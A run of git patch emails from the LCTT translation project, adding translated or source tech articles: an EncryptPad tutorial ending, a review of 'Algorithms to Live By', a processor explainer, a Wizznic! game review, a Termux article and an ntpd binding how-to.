+[![Success Encrypt][13]][14]
+```
+文件已经被密码和密钥加密了 。
+```
+
+```
+如果你想解密被加密后的文件 ,打开 EncryptPad ,点击 File Encryption ,选择 Decryptio 操作 ,提供加密文件的地址和输出解密文件的地址 ,提供密钥文件地址 ,点击 Start 按钮 ,如果请求输入密码 ,输入你先前加密使用的密码 ,点击 OK 按钮开始解密过程 。当过程成功完成 ,你会看到 “ File has been decrypted successfully message ” 。
+```
+[![decrypt ][16]][17]
+[![][18]][18]
+[![][13]]
+
+
+**注意**
+```
+如果你遗忘了你的密码或者丢失了密钥文件 ,没有其他的方法打开你的加密信息 。对于 EncrypePad 支持的格式是没有后门的 。
+```
+
+--------------------------------------------------------------------------------
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dash.png
+[2]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dash.png
+[3]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dashboard.png
+[4]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dashboard.png
+[5]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-key.png
+[6]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-key.png
+[7]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-passphrase.png
+[8]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-passphrase.png
+[9]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-use-key-file.png
+[10]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-use-key-file.png
+[11]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-start-encryption.png
+[12]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-start-encryption.png
+[13]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-file-encrypted-successfully.png
+[14]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-file-encrypted-successfully.png
+[15]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-page.png
+[16]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-page.png
+[17]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-passphrase.png
+[18]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-passphrase.png
+[19]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-successfully.png
+[20]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-successfully.png
\ No newline at end of file
From aa5579732272ecf925c94c27cada42dc22ef57f8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 08:47:12 +0800
Subject: [PATCH 034/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Review:=20Algorit?=
=?UTF-8?q?hms=20to=20Live=20By=20by=20Brian=20Christian=20&=20Tom=20Griff?=
=?UTF-8?q?iths?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...e By by Brian Christian - Tom Griffiths.md | 44 +++++++++++++++++++
1 file changed, 44 insertions(+)
create mode 100644 sources/tech/20171022 Review- Algorithms to Live By by Brian Christian - Tom Griffiths.md
diff --git a/sources/tech/20171022 Review- Algorithms to Live By by Brian Christian - Tom Griffiths.md b/sources/tech/20171022 Review- Algorithms to Live By by Brian Christian - Tom Griffiths.md
new file mode 100644
index 0000000000..edd1844f71
--- /dev/null
+++ b/sources/tech/20171022 Review- Algorithms to Live By by Brian Christian - Tom Griffiths.md
@@ -0,0 +1,44 @@
+Review: Algorithms to Live By
+======
+![](https://www.eyrie.org/~eagle/reviews/covers/1-62779-037-3.jpg)
+
+Another read for the work book club. This was my favorite to date, apart from the books I recommended myself.
+
+One of the foundations of computer science as a field of study is research into algorithms: how do we solve problems efficiently using computer programs? This is a largely mathematical field, but it's often less about ideal or theoretical solutions and more about making the most efficient use of limited resources and arriving at an adequate, if not perfect, answer. Many of these problems are either day-to-day human problems or are closely related to them; after all, the purpose of computer science is to solve practical problems with computers. The question asked by Algorithms to Live By is "can we reverse this?": can we learn lessons from computer science's approach to problems that would help us make day-to-day decisions?
+
+There's a lot of interesting material in the eleven chapters of this book, but there's also an amusing theme: humans are already very good at this. Many chapters start with an examination of algorithms and mathematical analysis of problems, dive into a discussion of how we can use those results to make better decisions, then talk about studies of the decisions humans actually make... and discover that humans are already applying ad hoc versions of the best algorithms we've come up with, given the constraints of typical life situations. It tends to undermine the stated goal of the book. Thankfully, it in no way undermines interesting discussion of general classes of problems, how computer science has tackled them, and what we've learned about the mathematical and technical shapes of those problems. There's a bit less self-help utility here than I think the authors had intended, but lots of food for thought.
+
+(That said, it's worth considering whether this congruence is less because humans are already good at this and more because our algorithms are designed from human intuition. Maybe our best algorithms just reflect human thinking. In some cases we've checked our solutions against mathematical ideals, but in other cases they're still just our best guesses to date.)
+
+This is the sort of a book where a chapter listing is an important part of the review. The areas of algorithms discussed here are optimal stopping, explore/exploit decisions (when to go with the best thing you've found and when to look for something better), sorting, caching, scheduling, Bayes's rule (and prediction in general), overfitting when building models, relaxation (solving an easier problem than your actual problem), randomized algorithms, a collection of networking algorithms, and finally game theory. Each of these has useful insights and thought-provoking discussion of how these sometimes-theoretical concepts map surprisingly well onto daily problems. The book concludes with a discussion of "computational kindness": an encouragement to reduce the required computation and complexity penalty for both yourself and the people you interact with.
+
+If you have a computer science background (as I do), many of these will be familiar concepts, and you might be dubious that a popularization would tell you much that's new. Give this book a shot, though; the analogies are less stretched than you might fear, and the authors are both careful and smart about how they apply these principles. This book passes with flying colors a key sanity check: the chapters on topics that I know well or have thought about a lot make few or no obvious errors and say useful and important things. For example, the scheduling chapter, which unsurprisingly is about time management, surpasses more than half of the time management literature by jumping straight to the heart of most time management problems: if you're going to do everything on a list, it rarely matters the order in which you do it, so the hardest scheduling problems are about deciding what not to do rather than deciding order.
+
+The point in the book where the authors won my heart completely was in the chapter on Bayes's rule. Much of the chapter is about Bayesian priors, and how one's knowledge of past events is a vital part of analysis of future probabilities. The authors then discuss the (in)famous marshmallow experiment, in which children are given one marshmallow and told that if they refrain from eating it until the researcher returns, they'll get two marshmallows. Refraining from eating the marshmallow (delayed gratification, in the psychological literature) was found to be associated with better life outcomes years down the road. This experiment has been used and abused for years for all sorts of propaganda about how trading immediate pleasure for future gains leads to a successful life, and how failure in life is because of inability to delay gratification. More evil analyses have (of course) tied that capability to ethnicity, with predictably racist results.
+
+I have [kind of a thing][1] about the marshmallow experiment. It's a topic that reliably sends me off into angry rants.
+
+Algorithms to Live By is the only book I have ever read to mention the marshmallow experiment and then apply the analysis that I find far more convincing. This is not a test of innate capability in the children; it's a test of their Bayesian priors. When does it make perfect sense to eat the marshmallow immediately instead of waiting for a reward? When their past experience tells them that adults are unreliable, can't be trusted, disappear for unpredictable lengths of time, and lie. And, even better, the authors supported this analysis with both a follow-up study I hadn't heard of before and with the observation that some children would wait for some time and then "give in." This makes perfect sense if they were subconsciously using a Bayesian model with poor priors.
+
+This is a great book. It may try a bit too hard in places (applicability of the math of optimal stopping to everyday life is more contingent and strained than I think the authors want to admit), and some of this will be familiar if you've studied algorithms. But the writing is clear, succinct, and very well-edited. No part of the book outlives its welcome; the discussion moves right along. If you find yourself going "I know all this already," you'll still probably encounter a new concept or neat explanation in a few more pages. And sometimes the authors make connections that never would have occurred to me but feel right in retrospect, such as relating exponential backoff in networking protocols to choosing punishments in the criminal justice system. Or the realization that our modern communication world is not constantly connected, it's constantly buffered, and many of us are suffering from the characteristic signs of buffer bloat.
+
+I don't think you have to be a CS major, or know much about math, to read this book. There is a lot of mathematical details in the end notes if you want to dive in, but the main text is almost always readable and clear, at least so far as I could tell (as someone who was a CS major and has taken a lot of math, so a grain of salt may be indicated). And it still has a lot to offer even if you've studied algorithms for years.
+
+The more I read of this book, the more I liked it. Definitely recommended if you like reading this sort of analysis of life.
+
+Rating: 9 out of 10
+
+Reviewed: 2017-10-22
+
+--------------------------------------------------------------------------------
+
+via: https://www.eyrie.org/~eagle/reviews/books/1-62779-037-3.html
+
+作者:[Brian Christian;Tom Griffiths][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.eyrie.org
+[1]:https://www.eyrie.org1-59184-679-X.html
From a5e4f44bc85ccc32ab13d86bc00deeef9bd82e1e Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 08:50:50 +0800
Subject: [PATCH 035/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Processors=20-=20?=
=?UTF-8?q?Everything=20You=20Need=20to=20Know?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...rocessors - Everything You Need to Know.md | 112 ++++++++++++++++++
1 file changed, 112 insertions(+)
create mode 100644 sources/tech/20171023 Processors - Everything You Need to Know.md
diff --git a/sources/tech/20171023 Processors - Everything You Need to Know.md b/sources/tech/20171023 Processors - Everything You Need to Know.md
new file mode 100644
index 0000000000..e3ee2e5998
--- /dev/null
+++ b/sources/tech/20171023 Processors - Everything You Need to Know.md
@@ -0,0 +1,112 @@
+Processors - Everything You Need to Know
+======
+![](http://www.theitstuff.com/wp-content/uploads/2017/10/processors-all-you-need-to-know.jpg)
+
+Our digital devices like Phones, Computers and laptops have grown to become so sophisticated, that they are no longer just devices, they have evolved to become a part of us.
+
+They perform many tasks with the help of apps and software, But have we ever thought to wonder what powers these software? How do they perform their logic? Where is their brain?
+
+We already know that a CPU or **Processor** is the brain of any device that must process data or perform logical tasks.
+
+[![intel processors][1]][1]
+
+But what are the different **concepts behind Processors**? How are they evaluated? How are some processors faster than the others? And many such questions. So let 's have a look at some major terms involved with processors and see how they affect processing speed.
+
+### **Architecture**
+
+Processors come in different architectures, you must have come across different types of programs that say they are for 64Bit or 32Bit. What this means is that those programs support that particular processor architecture.
+
+If a processor has a 32 Bit Architecture it means that it can process 32 Bits of information in one processing cycle.
+
+Similarly, a 64 Bit processor will process 64 Bits in one cycle.
+
+Also, The amount of ram you can use also depends on the architecture. The amount of ram you can use depends upon the amount of memory in powers of 2 ^ architecture of the system.
+
+For a processor with 16-bit architecture, only 64 KB of ram is accessible. For a 32 Bit processor, the maximum usable ram is 4 GB. And for 64 Bit processor, it is 16 Exa-Byte.
+
+### **Cores**
+
+Cores are basically processing units in the computer. They receive instructions and act on it. The more Cores you have, the better your processing speed.
+
+Imagine it like workers in a factory, The more workers you have the faster you will be able to do work.
+
+But more workers will require more salary and there will be a little crowd in the factory. processorsSimilarly, having more cores will definitely boost up processing but more cores need more power and they also heat the CPU a little more than those with fewer cores.
+
+### **Clocking Speed**
+
+We often hear that a processor is of 1 GHz or 2 GHz or 3 GHz. So what are these GHz?
+
+[![cpu speed][2]][2]
+
+GHz is short for GigaHertz. Giga means 'Billion' and Hertz means 'one cycle per second'. So a processor of 2 GHz can perform 2 Billion cycles in one second.
+
+This is also known as 'frequency' or 'Clocking Speed' of your processor. The higher the number the better it is for your CPU.
+
+### **CPU Cache**
+
+CPU cache is a small memory unit inside the processor that stores some memory. Whenever we have to perform some task. Data needs to pass from the RAM to the CPU. Since the CPU works a lot faster than the RAM, most of the time the CPU is idle and waiting for data from the RAM. To solve this the RAM keeps sending data to the CPU Cache continuously.
+
+You usually get 2-3 Mb of CPU cache in most Mid - Range processors. And up to 6 in high-end ones. The more cache your processor has, the better it is.
+
+### **Lithography**
+
+The size of transistors used is the lithographic size of a processor. It is usually measured in NanoMeter and the lesser it is, the more compact your processor will be. This will allow for more cores to fit into the same slot and reduce power consumption.
+
+The latest Intel processors have a lithograph of 14 Nm.
+
+### **Thermal Design Power (TDP)**
+
+It represents the average power, in watts, the processor dissipates when operating at Base Frequency with all cores active under an Intel-defined, high-complexity workload.
+
+So the lower it is, the better for you. A lower TDP not only uses better power but it also generates less heat.
+
+[![battery cpu][3]][3]
+
+Desktop processors usually consume more energy and have a TDP in the range of above 40, Whereas their counterparts Mobile versions consume up to 3 times less energy.
+
+### **Memory Support(RAM)**
+
+I had already mentioned that how processor architecture affects the amount of RAM we can use. But that only holds true for theory. In practical application, the amount of ram you can use is usually enough for that specification of a processor. It is usually specified in the processors' specs.
+[![RAM][4]][4]
+It also mentions the DDR version number of memory supported.
+
+### **Overclocking**
+
+So I already spoke about clocking speed. Now overclocking is the process of forcing your CPU to perform more cycles.
+
+Gamers usually overclock their processors to get more juice out of their CPU. This surely increases speed but it also increases power consumption and heat generation.
+
+A lot of High-End Processors allow overclocking. But if we wish to overclock an unsupported Processor, we will have to manually install a new BIOS for our motherboard and do it.
+
+This may get the job done but it is neither safe nor suggested doing so.
+
+### **Hyper-Threading**
+
+When adding cores was not convenient to suite a particular processing need, Hyper-Threading was invented to create virtual cores.
+
+So when we say that a dual-core processor has Hyper-Threading, it has 2 physical cores and 2 virtual cores. So it is technically a Quad-core processor in the body of a dual-core one.
+
+### **Conclusion**
+
+A processor has many variables associated with it. And it is the most important part of any digital device. So it is very important that before selecting a device we carefully examine the specifications of its processor keeping all the above variables in mind.
+
+Variables like Clock-Speed, Cores, CPU cache and architecture should be maximum. While it is better that variables like TDP and lithography stay as low as possible.
+
+Still confused about something? Feel free to comment and I will try to reply asap.
+
+
+--------------------------------------------------------------------------------
+
+via: http://www.theitstuff.com/processors-everything-need-know
+
+作者:[Rishabh Kandari][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.theitstuff.com/author/reevkandari
+[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/download.jpg
+[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/download-1.jpg
+[3]:http://www.theitstuff.com/wp-content/uploads/2017/10/download-2.jpg
+[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/images.jpg
From 5e1bad6da06bbf7cbb2ad4a42a2bced18fb73b82 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 08:52:42 +0800
Subject: [PATCH 036/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Highly=20Addictiv?=
=?UTF-8?q?e=20Open=20Source=20Puzzle=20Game?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ighly Addictive Open Source Puzzle Game.md | 106 ++++++++++++++++++
1 file changed, 106 insertions(+)
create mode 100644 sources/tech/20171024 Highly Addictive Open Source Puzzle Game.md
diff --git a/sources/tech/20171024 Highly Addictive Open Source Puzzle Game.md b/sources/tech/20171024 Highly Addictive Open Source Puzzle Game.md
new file mode 100644
index 0000000000..9a662c835c
--- /dev/null
+++ b/sources/tech/20171024 Highly Addictive Open Source Puzzle Game.md
@@ -0,0 +1,106 @@
+Highly Addictive Open Source Puzzle Game
+======
+![](https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/10/Wizznic-Level4.png?resize=640%2C400&ssl=1)
+
+### About Wizznic!
+
+This is an open source game inspired by the classic Puzznic, a tile-matching puzzle arcade game developed and produced by Taito in 1989. The game is way more than a clone of Puzznic. But like Puzznic, it's a frighteningly addictive game. If you like puzzle games, Wizznic! is definitely a recommended download.
+
+The premise of the game is quite simple, but many of the levels are fiendishly difficult. The objective of each level is to make all the bricks vanish. The bricks disappear when they touch others of the same kind. The bricks are heavy, so you can only push them sideways, but not lift them up. The level has to be cleared of bricks before the time runs out, or you lose a life. With all but the first game pack, you only have 3 lives.
+
+### Installation
+
+I've mostly played Wizznic! on a Beelink S1 mini PC running a vanilla Ubuntu 17.10 installation. The mini PC only has on-board graphics, but this game doesn't require any fancy graphics card. I needed to install three SDL libraries before the game's binary would start. Many Linux users will already have these libraries installed on their PC, but they are trivial to install.
+
+`sudo apt install libsdl-dev`
+`sudo apt-get install libsdl-image1.2`
+`sudo apt-get install libsdl-mixer1.2`
+
+The full source code is available on GitHub available under an open source license, so you can compile the source code if you really want. The Windows binary works 'out of the box'.
+
+### Wizznic! in action
+
+To give a flavour of Wizznic! in action, here's a short YouTube video of the game in action. Apologies for the poor quality sound, this is my first video made with the Beelink S1 mini PC (see footnote).
+
+### Screenshots
+
+#### Level 4 from the Wizznic! 1 Official Pack
+
+![Wizznic! Level4][1]
+
+The puzzles in the first pack offer a gentle introduction to the game.
+
+#### Game Editor
+
+![Wizznic! Editor][2]
+
+The game sports its own puzzle creator. With the game editor, it's simple to make your own puzzles and share them with your friends, colleagues, and the rest of the world.
+
+Features of the game include:
+
+ * Atmospheric music - composed by SeanHawk
+ * 2 game modes: Career, Arcade
+ * Many hours of mind-bending puzzles to master
+ * Create your own graphics (background images, tile sets, fonts), sound, levels, and packs
+ * Built-in game editor - create your own puzzles
+ * Play your own music
+ * High Score table for each level
+ * Skip puzzles after two failed attempts to solve them
+ * Game can be controlled with the mouse, no keyboard needed
+ * Level packs:
+ * Wizznic! 1 - Official Pack with 20 levels, 5 lives. A fairly gentle introduction
+ * Wizznic! 2 - Official Pack with 20 levels
+ * Wizznic Silver - Proof of concept with 8 levels
+ * Nes levels - NES Puzznic with 31 levels
+ * Puzznic! S.4 - Stage 4 from Puzznic with 10 levels
+ * Puzznic! S.8 - Stage 8 from Puzznic with 10 levels
+ * Puzznic! S.9 - Stage 9 from Puzznic with 10 levels
+ * Puzznic! S.10 - Stage 10 from Puzznic with 9 levels
+ * Puzznic! S.11 - Stage 11 from Puzznic with 10 levels
+ * Puzznic! S.12 - Stage 12 from Puzznic with 10 levels
+ * Puzznic! S.13 - Stage 13 from Puzznic with 10 levels
+ * Puzznic! S.14 - Stage 14 from Puzznic with 10 levels
+
+
+
+### Command-Line Options
+
+![Wizznic Command Options][3]
+
+By default OpenGL is enabled, but it can be disabled. There are options to play the game in full screen mode, or scale to a 640×480 window. There's also Oculus Rift support, and the ability to dump screenshots of the levels.
+
+**OS** **Supported** **Notes** ![][4]![][5] Besides Linux and Windows, there are official binaries available for Pandora, GP2X Wiz, GCW-Zero. There are also unofficial ports available for Android, Debian, Ubuntu, Gentoo, FreeBSD, Haiku, Amiga OS4, Canoo, Dingux, Motorola ZN5, U9, E8, EM30, VE66, EM35, and Playstation Portable.
+
+Homepage: **[wizznic.org][6]**
+Developer: Jimmy Christensen (Programming, Graphics, Sound Direction), ViperMD (Graphics)
+License: GNU GPL v3
+Written in: **[C][7]**
+
+![][8]![][5] ![][9]![][10]
+
+**Footnote**
+
+The game's audio is way better. I probably should have tried the record facility available from the command line (see later); instead I used vokoscreen to make the video.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ossblog.org/wizznic-highly-addictive-open-source-puzzle-game/
+
+作者:[Steve Emms][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ossblog.org/author/steve/
+[1]:https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/10/Wizznic-Level4.png?resize=640%2C510&ssl=1
+[2]:https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/10/Wizznic-Editor.png?resize=640%2C510&ssl=1
+[3]:https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/10/Wizznic-CommandOptions.png?resize=800%2C397&ssl=1
+[4]:https://i1.wp.com/www.ossblog.org/wp-content/uploads/2017/01/linux.png?resize=48%2C48&ssl=1
+[5]:https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/01/tick.png?resize=49%2C48&ssl=1
+[6]:http://wizznic.org/
+[7]:https://www.ossblog.org/c-programming-language-profile/
+[8]:https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/01/windows.png?resize=48%2C48&ssl=1
+[9]:https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/01/apple_green.png?resize=48%2C48&ssl=1
+[10]:https://i1.wp.com/www.ossblog.org/wp-content/uploads/2017/01/cross.png?resize=48%2C48&ssl=1
From 88f3f86933c8028dca643187ef8fa023112a4baa Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:08:58 +0800
Subject: [PATCH 037/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Run=20Linux=20On?=
=?UTF-8?q?=20Android=20Devices,=20No=20Rooting=20Required!?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...On Android Devices, No Rooting Required.md | 68 +++++++++++++++++++
1 file changed, 68 insertions(+)
create mode 100644 sources/tech/20171024 Run Linux On Android Devices, No Rooting Required.md
diff --git a/sources/tech/20171024 Run Linux On Android Devices, No Rooting Required.md b/sources/tech/20171024 Run Linux On Android Devices, No Rooting Required.md
new file mode 100644
index 0000000000..e93ea4638a
--- /dev/null
+++ b/sources/tech/20171024 Run Linux On Android Devices, No Rooting Required.md
@@ -0,0 +1,68 @@
+translating by lujun9972
+Run Linux On Android Devices, No Rooting Required!
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Termux-720x340.jpg)
+
+The other day I was searching for a simple and easy way to run Linux on Android. My only intention was to just use Linux with some basic applications like SSH, Git, awk etc. Not much! I don't want to root the Android device. I have a Tablet PC that I mostly use for reading EBooks, news, and few Linux blogs. I don't use it much for other activities. So, I decided to use it for some Linux activities. After spending few minutes on Google Play Store, one app immediately caught my attention and I wanted to give it a try. If you're ever wondered how to run Linux on Android devices, this one might help.
+
+### Termux - An Android terminal emulator to run Linux on Android and Chrome OS
+
+**Termux** is an Android terminal emulator and Linux environment app. Unlike many other apps, you don 't need to root your device or no setup required. It just works out of the box! A minimal base Linux system will be installed automatically, and of course you can install other packages with APT package manager. In short, you can use your Android device like a pocket Linux computer. It's not just for Android, you can install it on your Chrome OS too.
+
+Termux offers many significant features than you would think.
+
+ * It allows you to SSH to your remote server via openSSH.
+ * You can also SSH into your Android devices from any remote system.
+ * Sync your smart phone contacts to a remote system using rsync and curl.
+ * You could choose any shells such as BASH, ZSH, and FISH etc.
+ * You can choose different text editors such as Emacs, Nano, and Vim to edit/view files.
+ * Install any packages of your choice in your Android devices using APT package manager. Up-to-date versions of Git, Perl, Python, Ruby and Node.js are all available.
+ * Connect your Android device with a bluetooth Keyboard, mouse and external display and use it like a convergence device. Termux supports keyboard shortcuts .
+ * Termux allows you to run almost all GNU/Linux commands.
+
+
+
+It also has some extra features. You can enable them by installing the addons. For instance, **Termux:API** addon will allow you to Access Android and Chrome hardware features. The other useful addons are:
+
+ * Termux:Boot - Run script(s) when your device boots.
+ * Termux:Float - Run Termux in a floating window.
+ * Termux:Styling - Provides color schemes and powerline-ready fonts to customize the appearance of the Termux terminal.
+ * Termux:Task - Provides an easy way to call Termux executables from Tasker and compatible apps.
+ * Termux:Widget - Provides an easy way to start small scriptlets from the home screen.
+
+
+
+To know more about termux, open the built-in help section by long-pressing anywhere on the terminal and selecting the Help menu option. The only drawback is it **requires Android 5.0 and higher versions**. It could be more useful for many users if it supports Android 4.x and older versions. Termux is available in **Google Play Store** and **F-Droid**.
+
+To install Termux from Google Play Store, click the following button.
+
+[![termux][1]][2]
+
+To install it from F-Droid, click the following button.
+
+[![][1]][3]
+
+You know now how to try Linux on your android devices using Termux. Do you use any other better apps worth trying? Please mention them in the comment section below. I'd love to try them too!
+
+Cheers!
+
+Resource:
+
++[Termux website][4]
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/termux-run-linux-android-devices-no-rooting-required/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[2]:https://play.google.com/store/apps/details?id=com.termux
+[3]:https://f-droid.org/packages/com.termux/
+[4]:https://termux.com/
From 9cb97082afa2f3af939b2476d1d943634de6e74f Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:16:27 +0800
Subject: [PATCH 038/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20bind?=
=?UTF-8?q?=20ntpd=20to=20specific=20IP=20addresses=20on=20Linux/Unix?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... to specific IP addresses on Linux-Unix.md | 94 +++++++++++++++++++
1 file changed, 94 insertions(+)
create mode 100644 sources/tech/20171030 How to bind ntpd to specific IP addresses on Linux-Unix.md
diff --git a/sources/tech/20171030 How to bind ntpd to specific IP addresses on Linux-Unix.md b/sources/tech/20171030 How to bind ntpd to specific IP addresses on Linux-Unix.md
new file mode 100644
index 0000000000..be091e91a2
--- /dev/null
+++ b/sources/tech/20171030 How to bind ntpd to specific IP addresses on Linux-Unix.md
@@ -0,0 +1,94 @@
+How to bind ntpd to specific IP addresses on Linux/Unix
+======
+By default, my ntpd/NTP server listens on all interfaces or IP address i.e 0.0.0.0:123. How do I make sure ntpd only listen on a specific IP address such as localhost or 192.168.1.1:123 on a Linux or FreeBSD Unix server?
+
+NTP is an acronym for Network Time Protocol. It is used for clock synchronization between computers. The ntpd program is an operating system daemon which sets and maintains the system time of day in synchronism with Internet standard time servers.
+[![How to prevent NTPD from listening on 0.0.0.0:123 and binding to specific IP addresses on a Linux/Unix server][1]][1]
+The NTP is configured using ntp.conf located in /etc/ directory.
+
+## interface directive in /etc/ntp.conf
+
+
+You can prevent ntpd to listen on 0.0.0.0:123 by setting the interface command. The syntax is:
+`interface listen IPv4|IPv6|all
+interface ignore IPv4|IPv6|all
+interface drop IPv4|IPv6|all`
+The above configures which network addresses ntpd listens or dropped without processing any requests. The ignore prevents opening matching addresses, drop causes ntpd to open the address and drop all received packets without examination. For example to ignore listing on all interfaces, add the following in /etc/ntp.conf:
+`interface ignore wildcard`
+To listen to only 127.0.0.1 and 192.168.1.1 addresses:
+`interface listen 127.0.0.1
+interface listen 192.168.1.1`
+Here is my sample /etc/ntp.conf file from FreeBSD cloud server:
+`$ egrep -v '^#|$^' /etc/ntp.conf`
+Sample outputs:
+```
+tos minclock 3 maxclock 6
+pool 0.freebsd.pool.ntp.org iburst
+restrict default limited kod nomodify notrap noquery nopeer
+restrict -6 default limited kod nomodify notrap noquery nopeer
+restrict source limited kod nomodify notrap noquery
+restrict 127.0.0.1
+restrict -6 ::1
+leapfile "/var/db/ntpd.leap-seconds.list"
+interface ignore wildcard
+interface listen 172.16.3.1
+interface listen 10.105.28.1
+```
+
+
+## Restart ntpd
+
+Reload/restart the ntpd on a FreeBSD unix:
+`$ sudo /etc/rc.d/ntpd restart`
+OR [use the following command on a Debian/Ubuntu Linux][2]:
+`$ sudo systemctl restart ntp`
+OR [use the following on a CentOS/RHEL 7/Fedora Linux][2]:
+`$ sudo systemctl restart ntpd`
+
+## Verification
+
+Use the netstat command/ss command for verification or to make sure ntpd bind to the specific IP address only:
+`$ netstat -tulpn | grep :123`
+OR
+`$ ss -tulpn | grep :123`
+Sample outputs:
+```
+udp 0 0 10.105.28.1:123 0.0.0.0:* -
+udp 0 0 172.16.3.1:123 0.0.0.0:* -
+```
+
+udp 0 0 10.105.28.1:123 0.0.0.0:* - udp 0 0 172.16.3.1:123 0.0.0.0:* -
+
+Use [the sockstat command on a FreeBSD Unix server][3]:
+`$ sudo sockstat
+$ sudo sockstat -4
+$ sudo sockstat -4 | grep :123`
+Sample outputs:
+```
+root ntpd 59914 22 udp4 127.0.0.1:123 *:*
+root ntpd 59914 24 udp4 127.0.1.1:123 *:*
+```
+
+root ntpd 59914 22 udp4 127.0.0.1:123 *:* root ntpd 59914 24 udp4 127.0.1.1:123 *:*
+
+## Posted by:Vivek Gite
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][4], [Facebook][5], [Google+][6].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/how-to-bind-ntpd-to-specific-ip-addresses-on-linuxunix/
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
